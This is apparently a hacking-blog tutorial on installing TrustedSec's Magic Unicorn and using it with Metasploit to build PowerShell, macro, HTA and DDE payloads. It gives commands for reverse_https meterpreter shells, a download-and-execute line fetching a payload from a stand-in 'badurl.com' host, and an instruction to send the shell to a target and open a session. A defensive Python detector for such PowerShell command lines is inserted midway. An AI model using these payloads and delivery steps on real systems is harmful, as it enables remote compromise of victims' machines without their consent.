Welcome to Hacking A Rise. Today we are going to show you the basic tutorial for Magic Unicorn for PowerShell exploitation.
What is Unicorn
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory.
It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by our own David Kennedy and Josh Kelly at Defcon 18.
Usage is simple. Ensure Metasploit is installed and in the right path. Run Magic Unicorn.
This will generate a PowerShell command. Simply paste this into a command line window or deliver it through a payload delivery system.
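From the defender's side, the two behaviours described above (an engine downgrade and a pasted one-line PowerShell command) show up in process-creation logs. The sketch below is an added example, not part of the original post or the Unicorn project. The function names, the 200-character threshold and the sample command lines are assumptions made here, and the heuristics describe PowerShell command lines in general, not Unicorn's exact output.

```python
import base64
import re

# Heuristic: a long unbroken base64 run on a command line (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/=]{200,}")


def is_flag(token, full_name):
    """True if token abbreviates a powershell.exe parameter, e.g. -enc or -ver.

    powershell.exe accepts unambiguous prefixes of parameter names, so matching
    only the full spelling would miss shortened forms.
    """
    name = token[1:].lower()
    return token.startswith("-") and name != "" and full_name.startswith(name)


def score_command_line(cmd):
    """Return the list of suspicious traits found in one process command line."""
    tokens = cmd.split()
    if not tokens or "powershell" not in tokens[0].lower():
        return []
    findings = []
    for i, tok in enumerate(tokens[1:], start=1):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if is_flag(tok, "version") and nxt.startswith("2"):
            findings.append("engine-downgrade")
        if is_flag(tok, "encodedcommand") or tok.lower() == "-ec":
            findings.append("encoded-command")
    if B64_RUN.search(cmd):
        findings.append("long-base64-argument")
    return findings


# Constructed sample data: a harmless script, UTF-16LE + base64 as -EncodedCommand expects.
BLOB = base64.b64encode(("Write-Output 'constructed sample'\n" * 8).encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed process-creation command lines, not real logs
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "powershell.exe -Version 2 -NoP -Command Get-Date",
    f"powershell.exe -w 1 -ver 2.0 -enc {BLOB}",
    "notepad.exe -enc notes.txt",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(score_command_line(event) or ["clean"], "<-", event[:60])
```

Feed it the command-line field from your process-creation events; a hit on "engine-downgrade" together with "encoded-command" is the combination worth alerting on first.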
How to install Unicorn
Open a terminal and type these commands:
git clone https://github.com/trustedsec/unicorn /unicorn
cd /unicorn
ls
python unicorn.py
How to use Unicorn
In the terminal, type python unicorn.py to get the commands.
Now, to make a shellcode, type one of these:
Usage: python unicorn.py payload reverse_ipaddr port
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py
Macro Example Shellcode: python unicorn.py
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py
HTA Example Shellcode: python unicorn.py
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py
Custom PS1 Example: python unicorn.py
Cobalt Strike Example: python unicorn.py
Custom Shellcode: python unicorn.py
For this I'm going to use python unicorn.py windows/meterpreter/reverse_https 192.168.8.101 443
Wait till it's done.
Now it's going to give you a code to run. Type msfconsole -r unicorn.rc to fire up Metasploit.
Just embed the shell and send it to your target, and a session will open. All you have to do is type sessions 1, then shell.